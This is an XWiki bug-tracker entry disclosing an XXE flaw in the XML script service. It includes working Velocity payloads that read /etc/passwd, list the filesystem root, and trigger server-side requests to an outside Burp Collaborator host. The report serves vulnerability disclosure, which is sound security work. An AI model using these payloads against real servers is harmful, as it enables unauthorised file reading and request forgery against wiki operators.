Uploaded image for project: 'XWiki Platform'
  1. XWiki Platform
  2. XWIKI-18946

XML External Entity Injection (XXE) through XML script service

    XMLWordPrintable

Details

    • Unit
    • Unknown
    • N/A

    Description

      Any user with velocity script permission can read arbitrary files, directory listing and Server-side request forgery.

      • Read arbitrary files payload: 
        {{velocity}}
        #set($xml=$services.get('xml'))
        #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///etc/passwd' >]><root><foo>&xxe;</foo></root>")
        #set($doc=$xml.parse($xxe_payload))
        $xml.serialize($doc)
        {{/velocity}}
      • Directory listing payload:

      {{velocity}}
      #set($xml=$services.get('xml'))
      #set($xxe_payload = "<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root[<!ENTITY xxe SYSTEM 'file:///' >]><root><foo>&xxe;</foo></root>")
      #set($doc=$xml.parse($xxe_payload))
      $xml.serialize($doc)
      {{/velocity}}

      • SSRF payload:

      {{velocity}}
      $services.get('xml').parse("<!DOCTYPE test [ <!ENTITY xxe SYSTEM 'http://ao2r99e546em76d8rliq7hcil9rzfo.burpcollaborator.net/a'> ]>
      <productId>&xxe;</productId >")
      {{/velocity}}

       

      Attachments

        Issue Links

          Activity

            People

              tmortagne Thomas Mortagne
              PetrusViet Petrus Viet (a member of VNG Security)
              Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

                Created:
                Updated:
                Resolved: